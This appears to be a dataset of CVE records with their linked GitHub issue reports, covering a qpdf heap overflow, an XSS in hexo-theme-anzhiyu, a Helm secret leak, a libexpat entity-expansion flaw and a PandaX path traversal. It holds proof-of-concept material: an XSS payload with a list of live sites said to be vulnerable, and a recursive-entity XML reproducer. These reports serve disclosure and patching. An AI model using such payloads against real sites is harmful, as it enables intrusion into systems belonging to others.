fa fa[fa]00 00 00 00 0x0c0c7fff9a60: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9a70: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9a80: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 0x0c0c7fff9a90: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3736122==ABORTING [Inferior 1 (process 3736122) exited with code 01] ``` ### Environment ```shell Distributor ID: Ubuntu Description: Ubuntu 22.04.3 LTS Release: 22.04 Codename: jammy gcc version 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04) clang version 11.0.0 (https://github.com/aflgo/aflgo fa125da5d70621daf7141c6279877c97708c8c1f) afl-cc++4.09a build-essential is already the newest version (12.9ubuntu3). libjpeg-dev is already the newest version (8c-2ubuntu10). ghostscript is already the newest version (9.55.0~dfsg1-0ubuntu5.6). libgnutls28-dev is already the newest version (3.7.3-4ubuntu1.3). libssl-dev is already the newest version (3.0.2-0ubuntu1.12). zlib1g-dev is already the newest version (1:1.2.11.dfsg-2ubuntu9.2). libtiff-tools is already the newest version (4.3.0-6ubuntu0.7). cmake is already the newest version (3.22.1-1ubuntu1.22.04.1). ``` ### Credit Chen zhiyuan ([2507519957@qq.com](mailto:2507519957@qq.com)/[czy_edu@whut.edu.cn](mailto:czy_edu@whut.edu.cn))
qpdf11.9.0 found a heap-buffer-overflow crash
https://api.github.com/repos/qpdf/qpdf/issues/1123/comments
4
2024-01-15T02:29:15Z
2024-02-04T23:10:11Z
https://github.com/qpdf/qpdf/issues/1123
2,081,133,505
1,123
6,002
CVE-2024-25865
2024-03-02T22:15:50.293
Cross Site Scripting (XSS) vulnerability in hexo-theme-anzhiyu v1.6.12, allows remote attackers to execute arbitrary code via the algolia search function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:anzhiyu-c:hexo-theme-anzhiyu:1.6.12:*:*:*:*:*:*:*", "matchCriteriaId": "771C3906-072E-404B-9559-6DC3722B8C67", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "anzhiyu-c", "hexo-theme-anzhiyu" ]
### 使用的 AnZhiYu 版本? | What version of AnZhiYu are you use? 1.6.12 ### 使用的浏览器? || What browse are you using? Chrome ### 是否修改过主题文件? || Has the theme files been modified? 不是 (No) ### 使用的系统? || What operating system are you using? Windows ### 问题描述 | Describe the bug ## 1、hexo博客搭建 - 安装node.js和git ![image-20240209185304043](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/c9ff7dc8-0e92-4c74-a62b-b64a66e49366) - hexo博客框架安装 ```coffeescript npm install hexo-cli -g hexo init blog cd blog npm install hexo server ``` ## 2、更换anzhiyu主题 - 下载anzhiyu主题到themes目录 git clone https://github.com/anzhiyu-c/hexo-theme-anzhiyu.git ./themes/anzhiyu - 更改配置文件,将themes/anzhiyu/目录下的__config.yml文件名修改为_config.anzhiyu.yml。并将修改后的_config.anzhiyu.yml移动到blog目录下(和themes目录同级)。 ![image-20240209191312330](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/70451174-0919-4761-a547-bfe4ee5f368c) - 修改_config.yml文件中的theme为anzhiyu ![image-20240209191421389](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/1b641836-a6d9-4eba-a908-f3e3506e766f) - 如果你没有 pug 以及 stylus 的渲染器,请下载安装: npm install hexo-renderer-pug hexo-renderer-stylus --save - 保存,启动hexo server ## 3、开启algolia评论系统 根据官方文档中的搜索系统配置,开启algolia配置。官方链接: https://vcl-docs.anheyu.com/advanced/#%E6%90%9C%E7%B4%A2%E7%B3%BB%E7%BB%9F ![image-20240209192052895](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/5d970b3b-8b0a-4c30-b171-791866f5840b) ## 4、漏洞复现 ![image-20240209192334069](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/15ec17b7-0599-4b63-a467-fa151da17725) ![image-20240209193059206](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/5660bac9-ff96-4cc5-8a55-e731a240e05c) 在多个使用anzhiyu主题及开启algolia搜索的博主网站中都有此xss漏洞。``` <img src=1 onerror=alert(132)>``` 即可触发漏洞,如下: https://blog.anheyu.com/ https://ichika.cc/ https://www.fomal.cc/ https://zoulicheng.cn/ https://zhsher.cn/ ………… 几乎所有使用algolia搜索的网站中都有次xss漏洞。 ## 5、漏洞分析 原因在于algolia.js中对于搜索结果的回显没有过滤。 ![image-20240209194148822](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/924ade8a-1494-4236-9f59-5868b38f4d6e) 也就是说不管输入什么内容都在在结果区域回显。动态调试下js代码: ![image-20240209195655327](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/037f7e83-0885-4dda-bca5-730ef4ac2905) ![image-20240209195955415](https://github.com/anzhiyu-c/hexo-theme-anzhiyu/assets/33064321/94ed08bb-6b55-4b81-b7fe-08a7a7b87719) 修补建议:针对搜索输出进行的过滤 ### 出现问题的网站 | Website https://blog.anheyu.com/ https://ichika.cc/ https://www.fomal.cc/ https://zoulicheng.cn/ https://zhsher.cn/ …………
[Bug]: anzhiyu主题开启algolia搜索功能存在xss漏洞
https://api.github.com/repos/anzhiyu-c/hexo-theme-anzhiyu/issues/200/comments
1
2024-02-09T12:26:44Z
2024-02-09T14:10:32Z
https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200
2,127,036,392
200
6,003
CVE-2019-25210
2024-03-03T21:15:49.867
An issue was discovered in Cloud Native Computing Foundation (CNCF) Helm through 3.13.3. It displays values of secrets when the --dry-run flag is used. This is a security concern in some use cases, such as a --dry-run call by a CI/CD tool. NOTE: the vendor's position is that this behavior was introduced intentionally, and cannot be removed without breaking backwards compatibility (some users may be relying on these values). Also, it is not the Helm Project's responsibility if a user decides to use --dry-run within a CI/CD environment whose output is visible to unauthorized persons.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/helm/helm/issues/7275" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://helm.sh/blog/response-cve-2019-25210/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.cncf.io/projects/helm/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/helm/helm/issues/7275" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://helm.sh/blog/response-cve-2019-25210/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.cncf.io/projects/helm/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:helm:helm:-:*:*:*:*:*:*:*", "matchCriteriaId": "606B3397-0482-45AB-9683-716665632036", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/helm/helm/issues/7275
[ "Issue Tracking" ]
github.com
[ "helm", "helm" ]
<!-- If you need help or think you have found a bug, please help us with your issue by entering the following information (otherwise you can delete this text): --> Output of `helm version`: `helm version version.BuildInfo{Version:"v3.0.2", GitCommit:"19e47ee3283ae98139d98460de796c1be1e3975f", GitTreeState:"clean", GoVersion:"go1.13.5"}` Output of `kubectl version`: `kubectl version Client Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.3", GitCommit:"2d3c76f9091b6bec110a5e63777c332469e0cba2", GitTreeState:"clean", BuildDate:"2019-08-19T11:13:54Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"darwin/amd64"}` Cloud Provider/Platform (AKS, GKE, Minikube etc.): ### Issue `helm3` `--dry-run` command prints content of the secrets where helm2 just the fact that secret has been created. **This creates issue running helm `--dry-run` in CI/CD tools as it exposes secrets.** ``` helm upgrade --install myrelease mychart --set thanos.sayamlbase64=TESTSECRET --dry-run Release "myrelease" has been upgraded. Happy Helming! NAME: myrelease LAST DEPLOYED: Thu Dec 19 15:11:43 2019 NAMESPACE: kube-system STATUS: pending-upgrade REVISION: 400 TEST SUITE: None HOOKS: MANIFEST: --- # Source: mychart/templates/thanos-objstore-config-secret.yaml apiVersion: v1 data: thanos.yaml: TESTSECRET kind: Secret metadata: name: thanos-objstore-config namespace: kube-system type: Opaque --- ``` ``` helm2 upgrade --install release-name chart --set thanos.sayamlbase64=TESTSECRET --dry-run Release "release-name" has been upgraded. Happy Helming! LAST DEPLOYED: Thu Dec 19 14:51:59 2019 NAMESPACE: kube-system STATUS: DEPLOYED RESOURCES: ==> v1/Secret NAME TYPE DATA AGE thanos-objstore-config Opaque 1 80d ```
helm 3 shows secrets with --dry-run option in clear text
https://api.github.com/repos/helm/helm/issues/7275/comments
64
2019-12-19T21:19:04Z
2024-05-14T17:53:00Z
https://github.com/helm/helm/issues/7275
540,573,246
7,275
6,004
CVE-2024-28757
2024-03-10T05:15:06.570
libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Patch", "Release Notes" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/15/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/libexpat/libexpat/issues/839" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/libexpat/libexpat/pull/842" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FPLC6WDSRDUYS7F7JWAOVOHFNOUQ43DD/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKJ7V5F6LJCEQJXDBWGT27J7NAP3E3N7/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VK2O34GH43NTHBZBN7G5Y6YKJKPUCTBE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20240322-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Patch", "Release Notes" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/15/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/libexpat/libexpat/issues/839" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/libexpat/libexpat/pull/842" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FPLC6WDSRDUYS7F7JWAOVOHFNOUQ43DD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKJ7V5F6LJCEQJXDBWGT27J7NAP3E3N7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VK2O34GH43NTHBZBN7G5Y6YKJKPUCTBE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20240322-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "463A4DD2-9DA6-420C-A361-293B1166B9C6", "versionEndExcluding": "2.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*", "matchCriteriaId": "CA277A6C-83EC-4536-9125-97B84C4FAF59", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:ontap:9:*:*:*:*:*:*:*", "matchCriteriaId": "A20333EE-4C13-426E-8B54-D78679D5DDB8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:ontap_tools:10:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "5333B745-F7A3-46CB-8437-8668DB08CD6F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:windows_host_utilities:-:*:*:*:*:*:*:*", "matchCriteriaId": "15282AE5-2005-4852-8FC8-EF2CE0E28FB4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6770B6C3-732E-4E22-BF1C-2D2FD610061C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F9C8C20-42EB-4AB5-BD97-212DEB070C43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FFF7106-ED78-49BA-9EC5-B889E3685D53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*", "matchCriteriaId": "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "56409CEC-5A1E-4450-AA42-641E459CC2AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*", "matchCriteriaId": "B06F4839-D16A-4A61-9BB5-55B13F41E47F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0B4AD8A-F172-4558-AEC6-FF424BA2D912", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*", "matchCriteriaId": "8497A4C9-8474-4A62-8331-3FE862ED4098", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*", "matchCriteriaId": "CDDF61B7-EC5C-467C-B710-B89F502CD04F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h610c_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "89612649-BACF-4FAC-9BA4-324724FD93A6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h610c:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3D9B255-C1AF-42D1-BF9B-13642FBDC080", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "FD7CFE0E-9D1E-4495-B302-89C3096FC0DF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*", "matchCriteriaId": "F63A3FA7-AAED-4A9D-9FDE-6195302DA0F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "776" ]
776
https://github.com/libexpat/libexpat/issues/839
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "libexpat", "libexpat" ]
# Issue This is the public side of soon-public (access protected) oss-fuzz Expat finding: [Issue 66812: expat:xml_parse_fuzzer_UTF-16: Timeout in xml_parse_fuzzer_UTF-16](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=66812). The three key (access protected) contained links are: - Detailed Report: https://oss-fuzz.com/testcase?key=5187173185814528 - Regressed: https://oss-fuzz.com/revisions?job=libfuzzer_asan_expat&range=202401100604:202401110602 - Reproducer Testcase: https://oss-fuzz.com/download?testcase_id=5187173185814528 The reproducer (original attached as file [clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt](https://github.com/libexpat/libexpat/files/14502184/clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt)) is essentially this two-file case: File `one.xml`: ```xml <!DOCTYPE doc SYSTEM "two.dtd"> <doc>&g1;</doc> ``` File `two.dtd`: ```xml <!ENTITY % p1 '%p1'> <!ENTITY g1 '%p1;'> ``` The original's SHA245 sum is `6b870c78cff9efe41f1060277f434da98b9f78e9159baf4cb95f034e890ac087`. The regression link effectively links to https://github.com/libexpat/libexpat/compare/be47f6d5e871382dc2ab783a9df416ec4370074e...716fd10bd461be13c1f67ab11d96ca16a9a202ab (which makes good sense since these changes increase fuzzing coverage). # Analysis [ClusterFuzz](https://google.github.io/clusterfuzz/) uncovered two things at once here: - Direct recursion (`a -> a` in contrast to indirect recursion `a -> b -> a`) of parameter entities (reference syntax `%name;`) was previously not detected in the [external subset](https://www.w3.org/TR/2006/REC-xml-20060816/#ExtSubset) — file `two.dtd` in the example above) — but it [is forbidden by the XML spec](https://www.w3.org/TR/2006/REC-xml-20060816/#norecursion) and was also causing undefined behavior at runtime. ```console # ./fuzz/xml_parse_fuzzer_UTF-8 [..]/clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt INFO: Running with entropic power schedule (0xFF, 100). INFO: Seed: 3441536382 INFO: Loaded 1 modules (21351 inline 8-bit counters): 21351 [0x558df02c6000, 0x558df02cb367), INFO: Loaded 1 PC tables (21351 PCs): 21351 [0x558df02cb368,0x558df031e9d8), ./fuzz/xml_parse_fuzzer_UTF-8: Running 1 inputs 1 time(s) each. Running: [..]/clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt [..]/expat/lib/xmlparse.c:6273:46: runtime error: applying zero offset to null pointer SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior [..]/expat/lib/xmlparse.c:6273:46 in ``` Pull request #841 addresses that problem. - The way that the fuzzing code uses external parsers (created via function [`XML_ExternalEntityParserCreate`](https://libexpat.github.io/doc/api/latest/#XML_ExternalEntityParserCreate)) caused a timeout revealing that due to the lack of any direct input bytes from the parent parser, the amplification ratio calculated by `accountingGetCurrentAmplification` was constantly reported as 1.0 and hence had little chance of stopping billion laughs attacks in practice. Pull request #842 addresses that problem. Two related side notes: - [ClusterFuzz](https://google.github.io/clusterfuzz/) leaked part of this finding — the recursion aspect — to the public corpus a few days ago as case `f9b6ba558667913f4554395e039c01f6d8217b43` that later disappeared from the public corpus again. - Statement… > If the same entity is declared more than once, the _first_ declaration encountered is binding; …in [section 4.2 Entity Declarations](https://www.w3.org/TR/2006/REC-xml-20060816/#sec-entity-decl) of the XML spec is worth noting, emphasis mine. CC @catenacyber @RMJ10 @Snild-Sony
OSS-Fuzz/ClusterFuzz finding 66812
https://api.github.com/repos/libexpat/libexpat/issues/839/comments
8
2024-03-03T22:40:00Z
2024-03-21T19:48:19Z
https://github.com/libexpat/libexpat/issues/839
2,165,602,679
839
6,005
CVE-2024-2564
2024-03-17T14:15:06.973
A vulnerability was found in PandaXGO PandaX up to 20240310 and classified as critical. This issue affects the function ExportUser of the file /apps/system/api/user.go. The manipulation of the argument filename leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257063.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/PandaXGO/PandaX/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.257063" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.257063" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/PandaXGO/PandaX/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.257063" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.257063" } ]
